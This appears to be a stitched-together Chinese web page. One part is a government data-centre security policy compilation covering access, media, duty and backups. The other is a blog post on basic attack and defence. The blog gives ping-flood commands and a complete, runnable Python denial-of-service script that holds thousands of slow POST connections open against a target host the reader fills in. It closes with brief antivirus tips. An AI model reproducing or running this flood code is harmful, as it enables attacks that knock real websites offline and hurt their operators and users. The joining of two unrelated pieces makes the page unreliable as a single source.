精华内容
参与话题
问答
  • 需要网络安全制度汇编请下载网络安全等级保护-信息安全管理制度汇编参考下载,等级保护测评公司,网络安全等级保护测评,等级保护测评机构,等级保护机构 需要加强等网络、信息安全级保护定级备案,网络安全测评及...

    需要网络安全制度汇编请下载 网络安全等级保护-信息安全管理制度汇编参考下载 ,等级保护测评公司,网络安全等级保护测评,等级保护测评机构,等级保护机构

       需要加强等网络、信息安全级保护定级备案,网络安全测评及网络安全整改工作。

       链接:https://pan.baidu.com/s/1Z5n_1S4hHUFfuuci2yIpnw 提取码:fwfi 
     

    • 机房管理制度

    为规范机房内部管理,确保系统安全可靠运行,特制定本制度。

    一、机房内部实行区域安全责任制,有关责任人对自己相应责任区负责。区域划分和相应责任人另行作出具体规定;

    二、工作人员进入机房实行权限管理制度,被授权人员按照权限刷卡进入相应区域;

    三、参观考察或者监测维修等非工作人员进入机房需经批准并登记,其在机房内的一切活动必须得到允许并接受监督;

    四、严禁将易燃易爆、强腐蚀、强磁性物品带入机房,未经许可不得将手机等移动通讯设备、摄影摄像设备和与工作无关的移动存储设备带入机房;

    五、未经允许严禁参观、拍照、录音、录像,禁止在机房内吸烟;

    六、进入机房必须戴鞋套或更换机房专用拖鞋;

    七、机房内物品摆放要整齐有序,机器设备要清洁干净,保持良好的卫生环境;严禁在机房内会客接待、大声喧哗,保持安静的工作环境;

    八、相关责任人要定时检查供电配电系统、空调通风系统、视频监控系统、门禁控制系统和消防安全系统等,确保各配套系统安全正常运转;

    九、严禁用机房内的计算机运行与工作无关的软件,以防计算机病毒感染;

    十、严禁随意拆卸设备、私自接线和开关电源等操作;

    十一、定时查看机房温度、湿度,保持其符合规定范围。

     

    • 介质管理制度

    一、本规定所称介质包括:硬盘、软盘、光盘、磁带、数字证书介质(USB Key/IC卡)、系统密钥介质等,分涉密和非涉密两种;

    二、非涉密介质的使用管理;

    1、非涉密介质包括通用产品如服务器驱动、防病毒软件系统光盘/软盘等;

    2、非涉密介质,实行谁使用管理的原则。

    三、涉密介质的使用管理;

    1、涉密介质管理遵循“统一购置、统一标识、统一备案、跟踪管理”的原则;

    2、实行专人管理。收发应履行清点、登记、编号、签收等手续,严格登记交接手续。要按类编号,注明涉密标识,并定期进行检查;

    3、涉密介质必须存放在安全场所的保密设备里;

    4、涉密介质严禁在与互联网连接的计算机和个人计算机上使用;

    5、各类涉密介质未经批准严禁外出使用,更不得外借使用。特殊情况携带涉密介质外出使用时,须履行审批手续;

    6、要根据介质的目录清单对介质的使用现状进行定期检查,检查项目包括数据的完整性和介质及数据的可用性检查。

    四、介质的销毁。

    1、与业务系统相关的涉密介质损坏后不得自行销毁或丢弃,需按照普通密码使用管理规定进行办理;

    2、非涉密介质的销毁,经单位领导批准后统一处理。

    • 软件管理制度

    一、软件管理的范围包括对操作系统、应用软件、数据库、安全软件、工具软件的采购、安装、使用、更新、维护、防病毒的管理;

    二、本中心所使用的操作系统、应用软件、数据库、安全软件、工具软件必须是正式版本,严禁使用测试版和盗版软件;

    三、中心重要系统出现故障或需要重装主要的应用软件,必须经中心领导批准才能进行安装;

    四、所有的涉密软件原件(盘)应严格登记,并由专人保管;

    五、软件的销毁应按有关的规定执行;

    六、软件的防病毒管理

    1、必须安装经相关部门认可的防、杀病毒软件产品;

    2、定期组织防病毒系统的病毒库升级及杀毒工作;

    3、不得使用未经批准和检测的外来软件或磁盘、光盘,不允许在计算机上玩游戏;

    4、发现病毒后立即使用防病毒工具进行检测和灭毒,如不能完全消灭病毒时,立即上报并暂停工作;

    5、对于染毒次数、杀毒后果进行详细记录,不得隐瞒不报。

    • 设备管理制度

    一、设备包括:计算机及配套设备、打印机、传真机、复印机、照相机、录像机等;

    二、设备管理实行责任到人制度,对所有设备进行区分,分别指定责任人;

    三、所有设备必须建立档案,记录设备的生产厂家、购买地点、用途、价格、型号、维修记录和责任人等信息;

    四、设备的使用说明、维修、技术资料、培训资料以及相关的书籍图纸等要分类保管;

    五、设备的转让、借出、报废、销毁,须报经机要局批准,并履行相应手续;

    六、严格按操作规程使用设备,保持设备清洁,定期维护保养,确保设备正常运转;

    七、根据工作需要,需购置新设备的,写出书面申请报机要局批准,内容包括申请理由、用途、预算等;

    八、拟购设备必须是是国家认可的产品;

    九、所购设备要及时备案。

    • 环境管理制度

    一、周边环境安全管理

    1、通过电子视频和警报系统对机房门口进行监控;

    2、对机房配套设施应经常进行检查,及时维修,保证设备正常使用。

    二、涉密场所安全保密管理

    1、涉密机房。

    1)涉密信息系统按有关规定,确定保密要害部门、部位,实施安全保密管理;

    2)机房建设应满足GB 50174、GB/T 2887-2000的要求,并在防火、防水、防震、防雷、防静电、布线、电力等方面应符合GB 9361-1988中A类机房建设要求;

    3)对于机房涉密程度较高的区域,进入时实行指纹或刷卡验证方式。离开机房应关好门窗,节假日打开报警装置;

    4)机房安全实行责任制,分区域专人管理;

    5)机房核心区域内采取相应防护措施,设置监控录像并对机房进出人员情况进行监控,自动记录日志;

    6)接待参观考察或本系统的人员进入机房,应有相关人员陪同,做好登记;设备检修、调试等外来人员,应先登记报领导同意后,方可进入;

    7)禁止携带与工作无关的具有录音、信息存储以及无线通信等功能的设备进入机房核心区域;

    8)工作人员应对机房内设备所发生的故障、处理过程和结果等做好详细登记;

    9)各类软件系统的维护、增删、配置的更改,各类硬件设备的添加、更换必需经严格审批后方可进行,并进行详细登记和记录;

    10)机房内应保持安静的工作环境,不大声喧哗。禁止会客、吸烟、喝水,未经允许不得拍照、摄像;

    11)工作人员临时离开机房,应及时关门;下班或节假日期间,应将涉密介质及相关保密设备应放入保密柜。

    2、无线、多媒体产品使用规定。

    1)禁止使用具有无线互联功能的信息设备处理涉密信息,凡用于处理涉密信息的信息设备应拆除具有无线联网功能的硬件模块;

    2)用于处理涉密信息的信息设备应禁止使用无线键盘、无线鼠标及其它无线互联的外围设备;

    3)在涉密场所内谈论涉及国家秘密事项时,应对具有音频输入功能并与互联网连接的信息设备采取关机断电措施;

    4)手机等无线通信和定位终端设备的使用应符合“中办发(2005)29号”文件的要求;

    5)手机存放屏蔽柜,严禁带入机房。

    3、安全巡查。

    1)建立日常、节假日值班制度,每天检查重要部位的安全状况,离岗时要进行安全和用电检查;

    2)做好工作区域内的防火、防盗等工作,发现异常情况及时处理。

    三、保障设施

    1、定期检测检修。为了密钥管理系统运行的稳定正常,定期对配套设施进行检测与检修;

    2、应不定期对机房内设置的消防器材、监控设备进行检查,以保证其有效性。

    • 培训考核制度

    培养和配备过硬的人才队伍,是成功实现技术转移、保证系统长期稳定和良好运转的重要保障。为此,对所有相关使用、管理人员进行全面、细致的培训是必不可缺的。

    一、培训内容和目标。

    1、培训内容:主要包括但不限于网络安全基础知识、信息系统的基本原理和基本的操作维护常识;中心网站及信息管理系统的安装、使用、故障处理、维护等内容。

    2、培训目标:全面了解网络信息安全基础知识、信息系统的操作使用;能够掌握网站及信息系统相关设备的安装、调试与基本维护技能;能独立对安全设备进行管理、运行、故障处理及日常测试维护等工作,保障系统正常运行。

    二、培训方式。根据培训对象和培训内容的实际情况采用现场培训或集中培训的方式进行。

    三、培训时间和培训地点。时间根据培训需要另行确定;地点主要应安排在系统的研发现场、安装和使用现场。

    四、培训考核。培训完成后,对受训人员进行上机操作和笔试考核,所有受训人员考核必须全部过关。

    • 机房进出管理制度

    中心机房工作人员和参观访问者要严格遵守本规章制度。控制范围包括机房公共区、操作区、管理区、服务区和核心区,其中操作区、管理区、服务区和核心区称为敏感区域,而服务区和核心区又称为特别敏感区域。

    一、所有进出贵阳高**厅政务中心机房的人员都必须佩带有关证件来标示自己的身份,包括工作人员需要佩带职员工作证和外来访问者需要佩带访问者证件,中心管理员应及时制止并记录非法授权访问;

    二、访问者进入贵阳高**厅政务中心机房时要领取访问时间表格,访问完成之后要由接待者(必须是中心工作人员)签名本次访问时间的表格,并由访问者出门时交给办公室;

    三、参观访问人员进出敏感区域必须经中心领导的同意,同时必须要有贵阳高**厅政务中心的相关工作人员陪同,未经同意,不得擅自闯入敏感区域;中心工作人员进出敏感区域操作必须由两人协同进入(一人指纹,一人刷卡),同时要有详细的日志记录;

    四、需要访问敏感区域的访问者,必须由陪同的工作人员从公共区带领进入,必须穿鞋套或拖鞋进入,必要时需穿白大褂,保证机房清洁。参观期间,要求陪同的工作人员始终和访问者在一起,访问期间应注意机房卫生,访问结束后陪同人员负责协助回收访问证件;

    五、进出贵阳高**厅政务中心机房特别敏感区域必须由中心主任会指定的两名管理员协同配合,由一人刷卡,一人输入指纹进入机房,其中有一方不在场则不允许也不能进入机房的特别敏感区域;同时,对所有进出特别敏感区域的事件必须有详细的日志记录;

    六、所有卡、指纹和证件有专人管理,一旦丢失了卡或证件或指纹数据,必须立即向中心管理员报告,同时采取相应的补救措施,如取消该卡或该证件进出机房的权限以及补录指纹等措施;

    七、对公共区的访问可以由机房保安人员陪同,登记后即可访问和参观该区。

     

    • 岗位责任与权限管理制度

    贵阳高**厅政务中心信息系统日常运行维护管理,由工作人员严格按照划分的岗位执行,对应岗位赋予相应责任和权限。

    一、贵阳高**厅政务中心信息系统的日常运行维护管理工作由中心运维人员承担;

    二、按照运行维护需要设置相应的组织机构,保证系统安全运行、业务有序开展;

    三、根据运行维护需要设置业务岗位和管理岗位;

    四、业务岗位应包含业务管理人员、系统维护人员、文档和介质管理人员、业务受理和咨询服务人员;

    五、管理岗位应包含保密管理人员;

    六、岗位设置应责任到人,业务管理人员中,业务管理和操作人员与审计管理人员应设置不同人员;

    七、相应岗位人员不得越权使用系统。如岗位人员缺岗需其他人员代岗,须先报请运行维护领导者批准。

    • 机房日常安全管理制度-总则

    必须严格遵守《互联网信息服务管理办法》、《互联网电子公告服务管理规定》、《中华人民共和国计算机信息网络国际联网管理暂行规定》等国家有关法律法规;

    严格执行安全保密制度,对所提供的信息负责;不得利用计算机网络从事危害国家安全、泄露国家秘密等犯罪活动,不得制作、查阅、复制和传播有碍社会治安和有伤风化的信息;必须接受并配合国家有关部门、各级网络中心依法进行监督检查;

    严格执行有关维护管理的各项规章制度,维护规程;

    机房保持整齐、清洁,严禁吸烟、吃零食、闲谈及大声喧哗;制定机房每日清扫人员安排表,并定期进行大扫除;

    爱惜设备、仪器,保持设备的日常清洁,严禁携带强磁物进入机房,进入机房时要更换专用工作服和专用工作鞋;

    为了保证系统的正常运行,以及机房对运行和安全上的要求,在机房实行7*24*365值班制度,值班人员为不少于1名,保证出现故障能及时处理;

    凡进入机房进行日常维护和检查需两名以上工作人员,一人操作,另一人对所做操作进行记录;

    维护网络、机房的安全使用,发现故障及时处理并填写好各项记录;

    对设备应按正常规程进行操作,不得随意进行任何与工作无关的其他操作;

    机房内的任何设备不得随意拆卸、破坏;

    一般情况下,非工作人员不得进入机房;

    需要进出机房进行维护或其他非常规操作的人员,按机房出入控制制度进行管理;

    管理好各类原始记录和技术档案资料。定期向中心主管部门文档管理人员提交原始记录和技术档案资料归档管理;

    严禁携带照相机、摄像机等映像设备进入机房进行拍照、录像等活动;

    机房进出专人管理,做好登记;

    对各级机构人员编制、机房、设备图纸、系统资料等机密资料不得抄录影印或对外泄露;

    未经批准不得将机密图纸、机密文凭、软件版本、技术档案和内部资料携带出机房,并按时履行清退和登记签收手续。

     

    • 机房日常安全管理制度-日常维护管理

    日常维护指日常检测等经常性的简单维护工作,日常维护应在业务空闲时进行。发现不正常情况应及时处理和详细记录,对处理不了的问题,应立即向主管人员报告。日常维护工作主要内容包括:

    一、日志管理。主要是包括网络进出访问、机房对外应用系统、系统操作员的所有操作活动、与各分中心的交互活动、服务器运行情况、系统备份等信息进行日志记录。日志管理的功能包括:日志参数设置、日志查询、日志备份等。中心必须保存有全部详细的日志记录。设置独立的日志审计服务器存放各种日志信息,当日志库达到一定数量或日志记录超过一定时限的时候,操作员需归档备份日志,即是将日志转存到系统日志历史库中,保存于不可更改的介质上;

    二、日常检查。每日巡查至少四次,包括:配线间、空调房、UPS房、监控室、消防间、操作区和管理区,如有异常,按《机房故障事故处理流程》处理;每日早上上班后和晚上下班前检查各网络设备及各应用系统的状况,检查内容包括:防火墙进出访问情况、网络连接、监控系统检查、网站、OA、邮件系统以及日志检查等。如有异常,按《系统故障处理流程》处理;

    三、系统权限管理。针对不同的应用系统、用户实体、操作人员设置数据库信息的访问权限,应用系统功能的选择权限。系统提供对各种应用、各类用户实体、不同担任者的集中式的权限管理;

    四、系统服务维护。提供对各种业务流程的处理和管理方法的维护手段。维护的内容包括服务规则、服务参数设置和服务处理模式。服务维护应提供专门的界面,避免直接通过源程序或数据库进行操作;

    五、系统数据库维护。通过数据库系统提供的维护工具进行。操作人员要观察数据库系统运行的状况,及时对用户实体、数据库、数据空间进行调整,保证系统应能够在发生故障时恢复;

    六、系统服务器维护。通过服务器硬件厂商提供的维护工具进行。包括对服务器系统内部硬件资源的状态检测,对外部设备的检测、硬件障碍的恢复等;

    七、操作系统管理。通过操作系统厂商提供的维护工具进行的。包括对系统运行的状态检测,内部和外部设备的运行状态进行监视,对资源配置进行调整;

    八、系统网络管理。通过网管软件进行。运用设置在网管软件可以对机房各大系统如网站、主机、网络等设备进行集中检测、维护和控制;

    九、应用软件维护。应用软件开发应当按照国家软件工程相关技术标准提交文档资料。对应用软件因功能要求变化或软件出错的维护应当制订详细的可溯性文档,如问题分析、处理方法、处理结果等。

    • 机房日常安全管理制度设备管理

    必须对机房设备采取适当的、严格的安全防护措施以减少偶然无意构成的威胁,如硬设备故障、突然断电或电源波动太大等安全威胁。

    一、未经中心系统管理员同意,任何人不得打开机房服务器机柜,随意拆卸、更换交换机、服务器硬件配置等设备;

    二、机房设备的搬迁,必须填写《物品放行条》,经中心主管部门批准后,由中心系统管理员负责处理;

    三、需对机房设备定期进行设备清点和维护。并填写《机房设备清点列表》;

    四、机房内的所有设备,均应进行定期检查,防止磁场强度超标。

     

    • 机房日常安全管理制度系统安全管理

    一、计算机病毒防范制度。

    1、网络管理人员应有较强的病毒防范意识,定期进行病毒检测,发现病毒立即处理并通知管理部门或专职人员;

    2、采用国家许可的正版防病毒软件并及时更新软件版本;

    3、未经上级管理人员许可,当班人员不得在服务器上安装新软件,若确为需要安装,安装前应进行病毒例行检测;

    4、经远程通信传送的程序或数据,必须经过检测确认无病毒后方可使用。

    二、数据保密及数据备份制度。

    1、根据数据的保密规定和用途,确定使用人员的存取权限、存取方式和审批手续;

    2、禁止泄露、外借和转移专业数据信息;

    3、制定业务数据的更改审批制度,未经批准不得随意更改业务数据;

    4、业务数据规定每周定期、完整、真实、准确地转储到不可更改的介质上(磁带),并要求集中和异地保存,归档保存于保险柜内,保存期限至少十年;

    5、采取多种的数据备份模式,以确保数据的可靠安全,分为本机备份、交叉备份、实时备份、定期冷备份、远程容灾备份;

    6、备份数据每周必须检查一次,检查每日数据是否已经按时完整备份,备份过程是否出现异常;

    7、每月定期从归档备份数据中随机抽取样本进行恢复测试,以检查数据的完整性和可用性;

    8、备份的数据必须指定专人负责保管,由管理人员按规定的方法同数据保管员进行数据的交接。交接后的备份数据应在指定的数据保管室或指定的场所保管;

    9、备份数据资料保管地点应有防火、防热、防潮、防尘、防磁、防盗设施。

    三、网络安全。

    1、网络安全管理员主要负责机房网络的系统安全;

    2、严格控制网络上Email、BBS、WEB、FTP等工具传播或发表危害国家安全、泄露国家机密的信息,不得侵犯国家、社会、集体的利益和公民的合法权益,不得从事任何形式违法犯罪活动;

    3、网络安全管理员对于发现有重大安全事故或隐患,应及时保存证据并上报高一级网络管理部门和公安机关,由公安机关追究其相应责任;

    4、负责日常操作系统、网管系统、邮件系统的安全补丁、漏洞检测及修补等工作;

    5、网络安全管理员应时刻保持对最新网络技术的追踪掌握,实时了解网络的安全动向,了解各种黑客入侵手段,做到预防为主;

    6、良好周密的日志记录以及细致的分析经常是预测攻击,定位攻击,以及遭受攻击后追查攻击者的有力武器。察觉到网络处于被攻击状态后,网络安全管理员应确定其身份,并对其发出警告,提前制止可能的网络犯罪,若对方不听劝告,在保护系统安全的情况下可做善意阻击并向主管领导汇报;

    7、网络安全管理员每日负责检查各网络设备(包括防火墙、IDS、三层交换机、VPN设备、路由器、负载均衡等设备),以及对外开放访问系统(包括网站、电子邮件、对外应用服务等)的日志记录和运行情况,发现异常及时做好记录,并按相关规定进行处理;

    8、设置专门的日志审计查询服务器,对网络进出访问情况进行记录,并定期归档备份;

    9、定期对网络设备配置文件进行备份,并归档保存;

    10、定期测试恢复网络设备的归档配置备份,检查其可用性和准确性;

    11、所有网络设备必须保留一台作冗余,已备损坏后做到快速恢复;

    12、在做好本职工作的同时,应协助机房管理人员进行机房管理,严格按照机房制度执行日常维护;

    13、每月安全管理人员应向主管人员提交当月值班及事件记录,并对系统记录文件保存归档,以备查阅。

    • 机房日常安全管理制度人员管理

    一、操作员安全管理。中心的操作员分为:系统管理员、业务管理员和业务操作员。业务操作员由本中心业务管理员产生并赋予权限,业务管理员由本中心的系统管理员产生并赋予只有产生本中心业务操作员的权限,中心的系统管理员由系统初始化产生并赋予最大权限。

    对不同的操作员根据业务需要,可设置不同的操作权限,还允许根据实际需要修改操作员的权限。

    二、机房进出人员管理。机房出入控制指对内部和外部人员进出机房所作的限制和规定,具体包括:

    1、对机房应建立严格的进出管理制度,无关人员未经机房值班人员批准,严禁进入;

    2、机房采取分区控制。根据每个工作人员的实际工作需要规定能进入的区域,并对进入、退出时间及进入理由进行登记。对无权进入者的跨区域访问或外来者进入机房,必须经过机房值班人员的批准,并做好记录;

    3、进入机房需两人以上,采用密码输入加指纹的验证方式,进入核心区需按规定做好记录;

    4、凡不属于中心内部工作人员的其他单位工作人员进入机房前,必须填写《系统维护登记表》,经中心领导批准后,由机房值班人员陪同进入机房,机房值班人员应按照《维护登记表》严格监督此类工作人员进入中心机房后的工作并填写相关记录;

    5、凡跨区域或外来单位来访人员进入机房前,必须填写《来访登记表》,经中心主管部门领导批准后,由机房值班人员陪同进入机房。

    三、值班人员安全管理。为了保证系统的正常运行,以及机房对运行和安全上的要求,机房实行24小时值班制度,值班人员为不少于1名。对值班人员的要求如下:

    1、坚持四项基本原则,杜绝违反四项基本原则和情调不健康的信息上网或下载;

    2、严守保密规则,注意保守国家和部门的机密;

    3、遵守职业道德,为用户的个人资料、邮件和交换的数据文件保密;

    4、做好当天的卫生值日,保持机房的整齐、清洁;

    5、当班人员要严格遵守、并遵照执行机房管理制度,不得有任何违反行为;

    6、发生故障、迅速处理、及时排除。发生重大故障,例如服务器无法正常启动或某个软件模块不能正常运行一个小时以上,在处理同时,立即报告上级部门;

    7、当班人员要检查和分析设备及系统运行情况,保证设备的完好,电路合格通畅,系统运行正常;

    8、按规定时间上下班,未经批准不得擅自调换班次或离开岗位。在值班期间不得做与工作无关的事情;

    9、值班人员严格执行交接班制度,做到手续清楚,上下衔接;

    10、值班人员要正确及时的填写好各种原始记录,包括值班记录、故障记录、开通记录、设备日常检修记录、交接班记录。并妥善管理,直到交班;

    11、值班期间要尽职尽责,不得随意中断电力供应,不得随意改动系统数据;不得在毫无把握的情况下,对系统做任何的操作,以免破坏系统;

    12、未经上级主管部门批准,严禁修改系统数据;

    13、对系统所做的任何操作都要有详细的记录。

    四、交接班人员管理。交接班过程中双方人员的主要工作内容包括:

    1、检查网络、系统、动力及其他机房外围设备的运行情况;

    2、查看值班记录,了解系统运行情况;

    3、检查机房电源空调设备是否符合要求;

    4、防火装置及灭火器是否齐全、良好,告警装置是否正常;

    5、监控系统数据是否异常;

    6、在交接班时所发现的问题均应记入交接班记录薄中,并由交接双方签字;

    7、交接班时发生故障,暂缓交接,接班人员应协同处理或告一段落时再进行交接;

    8、属于漏交造成影响系统运行的,由交班人员负责;

    9、由于未认真进行接班而产生的问题,由接班人员负责。

    • 机房日常工作规范-每年工作

    一、系统脆弱性评估。每季度对系统进行脆弱性评估,扫描主要对外服务器的WEB漏洞和系统漏洞,针对发现的问题,进行安全防护,最终填写《主要对外服务器安全季度检测》。

    二、系统日志检查。检查中心信息系统的运行日志,分析日志中出现的异常。若日志中的异常因系统、网络故障所导致,将故障进行定级,把故障的情况和处理方法加入《中心系统故障处理规范》中。

    四、资料归档。归档《机房日常维护记录表》、《系统异常情况登记表》、《值班登记表》、《来访人员登记表》、《设备维护登记表》、《物品及费用管理登记表》;归档系统维护日志和数据库操作日志。

    五、清洗空调冷凝器(适用普通空调)。对于普通空调的室外冷凝器应每年至少清洗两次。使空调的冷凝器有良好的换热效果。避免空调室外风机的频繁启动及长时间运行。以提高空调的性能和节能。

    六、清洗/更换空调加湿器(适用精密空调)。对空调的加湿器应每季度作一次清洗工作,以使加湿器能正常工作保证机房的湿度正常和延长加湿器的工作寿命。对于结垢严重的加湿器应作更换。一般每年更换两次。

    七、清洁/更换空调过滤网。一定时间后空调的过滤网恢沾上较多的灰尘,为使空调具有较好的制冷效果,缩短空调压缩机的运行时间而节省电能及发挥空调的良好性能,过滤网需要每季度清洗一次。
    对于老化的或使用时间较长的过滤网应作更换处理,一般每年更换两次。

    八、检查空调制冷剂量(雪种)。对空调的制冷剂量一般在每年四-五月份(夏季空调使用高峰来临前)作一次检测,看空调制冷系统的制冷剂量是否合适。以免使压缩机过负荷工作或轻载工作而影响制冷效果。

    九、机房清洁。年终对机房所有设施及内外环境进行大扫除,保持机房一个洁净的环境。

    十、UPS保养。每半年进行一次UPS的完全充放电,放电完全后再充满电,保持UPS电池性能。本操作需要填写UPS保养记录表。

    十一、消防应急灯保养。每半年进行一次消防应急灯的完全充放电,即完全放电完全后再充满电,保持消防应急灯电池性能。本操作需要填写设备维护记录表。

    十二、蓄电池保养。每半年进行一次蓄电池的完全充放电,完全放电后再充满电,保持蓄电池的性能。本操作需要填写《设备维护登记表》。

    十三、环境综合检查。检查电力、空调、门禁、监控和消防系统:请物业和消防部门对机房各系统进行检查,杜绝隐患。

    • 机房日常工作规范-每月工作

    一、备份删除。检查各系统备份情况,根据备份机制,删除冗余

    备份,保证系统资源的有效利用,具体情况如下:

    1、备份机制为本机备份和备份终端备份,具体情况是:

    1)本机备份:信息系统本机数据库备份删除(保留完整的一个月数据)。
          2)终端备份:所有的删除机制都是自动进行,检查自动删除是否已完成即可;

          3)磁带备份:不做任何删除操作,检查磁带是否已满,如满

    则更换,直至无磁带更换时,擦录旧磁带,覆盖原有数据;删除备份应做到细心谨慎,不可误操作。除终端备份,一般都要保留一个月,即各系统都至少有一个月的数据存档保存。

    二、资料归档。归档《机房日常维护记录表》、《系统异常情况登记表》以及《值班登记表》;归档系统维护日志和数据库操作日志。

    三、监控系统维护。检查监控系统状态,主要包括监控软件的各项参数以及硬盘的使用状态,保证监控系统的正常运行。

    四、门禁系统维护。检查门禁软件的各项功能、上个月的门禁记录和硬盘的使用状态,将检查结果详细记录到《机房日常维护记录表》。

    五、操作系统升级。检查操作系统的最新升级包和补丁,并对操作系统进行升级/打补丁,保证服务器操作系统的安全。对操作系统打补丁,必须按照《系统变更制度》,经过严格的测试,并通过审核的情况下进行。

    六、设备资料备份。对重要设备资料进行备份,包括防火墙、入侵检测系统、核心交换机等重要设备的配置文件以及数据库的建表语句(如有改动)等。

    七、清洗空调室外冷凝器(适用精密空调)。空调室外冷凝器(也叫室外散热器)容易吸入较多灰尘,为使空调的冷凝器有良好的换热效果,避免空调室外风机的频繁启动及长时间运行,以提高空调的性能和节能,同时精密空调需要较好的维护,因此对精密空调的室外冷凝器每月用水冲洗一次。

    八、发电机每月检修。对机房发电机每月进行两次测试运行以便检修,保障发电机的正常运行和日常维护。

    九、消防每季度巡检。对机房消防系统进行季度巡检,保障消防系统的正常运行和日常维护,巡检内容请见《消防设备定期巡检记录表》。

    十、精密空调每季度巡检。对机房精密空调进行季度巡检,保障精密空调的正常运行和日常维护。

     

     

     


     

    展开全文
  • 信息安全攻防基础

    万次阅读 2020-07-13 04:21:39
    仅供学习和研究使用

    序言

    先明确本篇文章旨在让有意学习者了解计算机病毒入侵的手段和防护办法,请各位学习者自觉遵循中华人民共和国相关法律法规。 其次,如果认为“黑客是坏蛋",建议先看看黑客骇客谁是坏蛋?

    其实关于入侵技术的文章一直都是比较少,可能是因为现在国家企业对网络安全越来越重视了,越来越多的技术人员从事网络安全防护,病毒入侵也不似以前那么猖狂。

    计算机病毒介绍

    概念

    狭义上的计算机病毒是指能够进行自我传播,需要用户敢于来触发执行的破坏性程序或代码。

    计算机病毒分类

    • 按照计算机病毒攻击的系统分类:
      (1)攻击Windows系统的病毒
      (2)攻击DOS系统的病毒
      (3)攻击UNIX系统的病毒
      (4)攻击Operating System/2系统的病毒

    • 按照计算机病毒的链结方式分类
      (1)源码型病毒
      (2)嵌入型病毒
      (3)外壳型病毒
      (4)操作系统型病毒

    • 按照计算机病毒的破坏情况分类
      (1)良性计算机病毒
      (2)恶性计算机病毒
      (3)引导型计算机病毒

    • 按照计算机病毒的传播媒介分类
      (1)单机病毒
      (2)网络病毒

    黑客术语

    蠕虫:一段能进行自我传播,无须用户干预而可以自动触发执行额破坏性程序或代码。

    木马:是指附着在应用程序上或单独存在的一些恶意程序,他可以利用网络远程响应网络的另一端的控制程序的控制命令,实现对被植入木马的目标计算机的控制或者窃取感染木马程序 的计算机上的机密资料。

    后门:允许攻击者绕过系统中常规安全控制机制的程序,它按照攻击者自己的意图提供通道。

    僵尸(bot):是指实现恶意控制功能的程序代码。大量被植入僵尸程序的电脑通过僵尸控制服务器便可以形成僵尸网络。

    rootkit:室友很多有用的小程序组成的工具包,使得攻击者能够保持访问计算机上具有最高权限的用户“root”。 换言之 ,rootkit是可以持久的,无法被检测地存在于计算机的一组程序或代码。

    间谍软件:以主动收集用户个人信息,相关机密文件或隐私数据为主,收集到的数据会主动传送到指定服务器 。

    流氓软件:具有一定的实用价值但具备电脑病毒和黑客软件的部分特征的软件

    exploit:精心设计的用于利用特定漏洞以及对目标系统进行控制的程序

    提权:操作系统低权限的账户将自己提升为管理员权限使用的方法。

    后门:黑客为了对主机进行长期的控制,在机器上种植的一段程序或留下的一个“入口”。

    跳板:使用肉鸡IP来实施攻击的其他目标,以便更好的隐蔽自己的身份信息。

    旁站入侵:即同服务器下的网站入侵,入侵之后可以通过提权跨目录手段拿到目标网站的权限。(常见的工具有:WebRobot、御剑、明小子和web在线查询等) 。

    更多黑客术语查看

    搭建环境

    • 首先,安装Python
      相信这一步大家都轻车熟路的啦,在这里略过……
      (PS:以下演示环境为Python3.7)
      安装Python3.7

    • 安装虚拟机并安装Windows系统镜像
      攻击别人的电脑或网站犯法,所以自己搭建个虚拟机吧(说机不说吧,文明你我他)òᆺó
      安装VMware
      安装VitrualBox
      以上安装虚拟机方式任选其一,安装完成记得下载iso文件安装系统

    ping网络堵塞

    首先,需要获取攻击的ip地址(这个是最基本的,连没有ip地址都不知道,就啥也搞不了)。
    Windows系统获得本机的ip地址只需要打开命令提示符(cmd)并输入ipconfig就可以了。但是攻击的时候需要目标的ip地址,这个时候就需要抓包工具啦。
    常用的几款抓包工具 ,找一个你觉得顺眼的工具用一下吧!(这里说一下,黑客的软件,不能随便下载,指不准在软件里做了手脚打包发出来的,所以尽量还是去可靠的渠道下载黑客工具吧,例如官网~)
    如果是获取网站ip地址,直接打开cmd,ping一下域名就行了。
    ping baidu.com

    如图,得到的 就是ip地址
    在这里来个补充,ping一下ip,原理上是本机给对方ip地址发送请求,如果对方ip收到请求那么就给本机返回数据包~在这过程中对方ip地址对应的服务器(电脑)

    试想,如果一直发送会不会造成网络堵塞?
    因此有了以下操作:

    PING -t ip
    注:这样可以PING指定的IP到永远,除非你停止它。很多初级黑客喜欢用这个参数来进行网络堵塞的攻击。
    PING -l 大小 ip
    注:这样可以设置发送包大小
    PING -n 次数 ip
    注:这样可以设置次数。

    PING -n 10 -l 10 baidu.com

    利用ping造成网络堵塞的Python3.7代码

        import os
        import socket
        import time
        ip = input("请输入IP:")
        os.system("ping -t -l 50 " + ip)
    
    

    分布式拒绝服务攻击(DDos)

    分布式拒绝服务攻击可以使很多的计算机在同一时间遭受到攻击,是一种网络攻击手法,其目的在于使目标电脑的网络或系统资源耗尽,使服务暂时中断或停止,导致其正常用户无法访问。

    来看看Python3.7的DDos代码

        import socket
        import time
        import threading
        #Pressure Test,ddos tool
    
        #---------------------------
        MAX_CONN=20000
        PORT=80
        HOST=""#在双引号里输入对方IP或域名,要保证他联网了或开机了.
        PAGE="/index.php"
        #---------------------------
    
        buf=("POST %s HTTP/1.1\r\n"
        "Host: %s\r\n"
        "Content-Length: 10000000\r\n"
        "Cookie: dklkt_dos_test\r\n"
        "\r\n" % (PAGE,HOST))
    
        socks=[]
    
        def conn_thread():
            global socks
            for i in range(0,MAX_CONN):
                s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
                try:
                    s.connect((HOST,PORT))
                    s.send(buf.encode())
                    print ("Send buf OK!,conn=%d\n"%i)
                    socks.append(s)
                except Exception as ex:
                    print ("Could not connect to server or send error:%s"%ex)
                    time.sleep(0.1)
        #end def
    
        def send_thread():
            global socks
            while True:
                for s in socks:
                    try:
                        s.send("f".encode())
                        #print "send OK!"
                    except Exception as ex:
                        print ("Send Exception:%s\n"%ex)
                        socks.remove(s)
                        s.close()
                time.sleep(0.1)
        #end def
    
        conn_th=threading.Thread(target=conn_thread,args=())
        send_th=threading.Thread(target=send_thread,args=())
    
        conn_th.start()
        send_th.start()
    
    

    防护

    预防

    最简单最基础的网络攻击讲完了,那么接下来该学学学习如何保护自己的计算机啦(*σ´∀`)σ

    • 如果是Win10,打开自带的Defender
      傻瓜式设置,按照系统的提示把防火墙什么的都打开

    • 无特殊情况不装360安全卫士,并且卸载360的所有软件

    • 尽量不要安装破解软件

    • 看到明显的恶意捆绑软件不要安装,以及defender提示病毒的软件也尽量不要安装。

    • 不进不明不网站,不收奇怪邮件。下载完压缩包文件后先进行病毒扫描

